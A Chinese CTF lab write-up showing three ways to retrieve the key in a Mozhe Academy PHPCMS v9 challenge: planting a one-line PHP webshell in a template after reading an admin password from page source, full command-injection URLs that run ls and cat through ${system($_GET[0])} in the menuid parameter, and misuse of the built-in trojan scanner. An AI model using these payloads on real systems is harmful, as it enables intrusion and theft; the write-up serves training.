墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍

解法一

解题方法：
使用一句话木马进行连接
操作步骤：
1.对网址进行探测

2.发现后台版本文件robots.txt

发现CMS为 PHPCMS v9
后台登录页面为 admin.php
3.浏览

自动填入密码
浏览源码可以发现密码为：I@vH@U$9n8*
也可以将源码中密码的字段名由password改为text

4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7题)存在相同的文件上传漏洞

原文回顾：https://blog.csdn.net/ploto_cs/article/details/108879574

文件注入点位于上传处

jpg格式能够正常上传

Php始终被拦截，多次试验发现除图片格式的其他格式均被拦截,放弃该处
5.发现在界面—模板风格—详细列表—search—index.html发现文件可以修改可以添加一句话木马

添加一句话后 保存文件
6.这时木马就已经成功写入在index.html中
注：
此时的链接地址为((不要写错了)：

http://219.153.49.228:44865/index.php?m=search

成功填写信息后即可获取后台文件

注：一些版本的菜刀还有蚁剑都不能成功连接，可以尝试更换版本再进行连接
感谢@臭nana大佬的援助

原文链接：
https://blog.csdn.net/weixin_43784056/article/details/85062972?biz_id=102&utm_term=CMS%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%BA%AF%E6%BA%90%E7%AC%AC2%E9%A2%98&utm_medium=distribute.pc_search_result.none-task-blog-2_allsobaiduweb~default-7-85062972&spm=1018.2118.3001.4187

解法二

解题方法：
利用远程执行命令漏洞
操作步骤：
前面与解法一相同，都得成功登录后台
1.在URL中构造 查询命令
命令：

http://219.153.49.228:48673/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

可以看到包含key的文件出现，在使用命令打开文件
2.在URL中构造 查看key文件的命令
命令：

http://219.153.49.228:48673/index.php?0=cat key_418204667443.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

注：第二条命令中除了修改自己的ip时，还得把注意修改key_xxx.php文件，每个人的key不同
修改成功后，进入网址，再查看源代码，就可以看到密钥值了

解法三

实验方法：
我觉得算是平台漏洞，可以直接看到文件信息
操作步骤：
前面步骤与解法一相同，成功登录后台后
1.在扩展—木马查杀中
可以通过直接修改特征代码，查询key值

2.勾选key文件后提交扫描就可以在查杀报告中查看文件详细内容

网络信息安全—ploto
再次鸣谢@臭nana大佬的援助